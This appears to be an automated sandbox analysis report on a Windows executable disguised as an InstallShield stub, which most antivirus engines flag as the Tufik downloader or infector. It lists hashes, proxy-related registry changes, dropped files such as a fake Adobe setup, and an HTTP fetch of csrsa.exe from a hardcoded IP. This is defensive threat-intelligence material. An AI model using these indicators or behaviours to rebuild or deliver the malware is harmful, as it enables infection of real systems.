Analysis Date: 2015-01-23 22:40:55
MD5: 027d7143cfc80280e369fe6629748cce
SHA1: 7c386801d07d0b863294c3bcbc29aa21755b4e9f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 9526adb5d8d43bb0e33eb6b04a606b4d sha1: 28182fe85edf1399ff4c21c2afd9c02f34566d59 size: 72192
Section: .rdata md5: a776d4950f56f48b5506ca2a99ce2c75 sha1: 2f64556aaa730292b244812e0b16bba2a6c751dd size: 1536
Section: .data md5: 4b8d7f77aee55d927a629c55cf510431 sha1: ba2cbc77367fb2aedbc0ae6532fdea3cb679d1ee size: 12800
Section: .idata md5: 458dc65fdb3b609433c1ac0796db652e sha1: 8127ca331dcaffcf64267897269a0f186ec11853 size: 4096
Section: .rsrc md5: d4562c73ab69c8726b26e4981b214ba8 sha1: 27116c4e56f66d250eb824c563c92e8eae4447ed size: 38400
Section: .text md5: adaa6ebc53d81ff6ab71afcb5d054e73 sha1: 2f5b2c31dde4ef484ae09b292cedea997fc84b35 size: 5120
Timestamp: 1999-01-07 18:10:41
Version:
LegalCopyright: Copyright © 1996-1999 InstallShield Software Corporation
InternalName: STUB.EXE
FileVersion: 2.04.001
CompanyName: InstallShield Software Corporation
ProductName: PackageForTheWeb Stub
ProductVersion: 2.04.001
FileDescription: PackageForTheWeb Stub
OriginalFilename: STUB32.EXE
PEhash: f3db4a7ddc2568f9793c33e1f576594734791a02
IMPhash: f1c86bf7ba6c9508e02f21633db7d001
AV 360 Safe: Virus.Win32.TuFik.C
AV Ad-Aware: Win32.Tufik.P
AV Alwil (avast): Tufik:Win32:Tufik
AV Arcabit (arcavir): Win32.Tufik.P
AV Authentium: W32/Tufik.A.gen!Eldorado
AV Avira (antivir): TR/Dldr.Genome.agor
AV BullGuard: Win32.Tufik.P
AV CA (E-Trust Ino): Win32/tufik.J
AV CAT (quickheal): W32.Tufik.gen
AV ClamAV: Trojan.Downloader-98394
AV Dr. Web: Trojan.DownLoader.4268
AV Emsisoft: Win32.Tufik.P
AV Eset (nod32): Win32/Tufik.NAA virus
AV Fortinet: W32/Fujacks.BF!tr
AV Frisk (f-prot): W32/Tufik.A.gen!Eldorado
AV F-Secure: Win32.Tufik.P
AV Grisoft (avg): Win32/Tufik.A
AV Ikarus: Virus.Win32.Tufik
AV K7: Trojan-Downloader ( 00132cab1 )
AV Kaspersky: Virus.Win32.Pioneer.ak
AV MalwareBytes: no_virus
AV Mcafee: W32/Tufik
AV Microsoft Security Essentials: Virus:Win32/Tufik.D
AV MicroWorld (escan): Win32.Tufik.P
AV Rising: Win32.Tufik.p
AV Sophos: W32/Tufik-Fam
AV Symantec: W32.Tufik.B!inf
AV Trend Micro: PE_TUFIK.JK-1
AV VirusBlokAda (vba32): Virus.Expiro.ad

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.mdmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.hdmp
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Setup.exe
Creates File: \Device\Afd\AsyncConnectHlp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\18f3_appcompat.txt
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 296
Creates Process: C:\WINDOWS\system32\drwtsn32 -p 1280 -e 204 -g
Creates Mutex: open
Winsock DNS: 8.5.1.46
Winsock URL: http://8.5.1.46/csrsa.exe

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 296

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1280 -e 204 -g

Network Details:

DNS: 85773.com
Type: A
8.5.1.46
HTTP GET: http://8.5.1.46/csrsa.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 8.5.1.46:80

Raw Pcap

Strings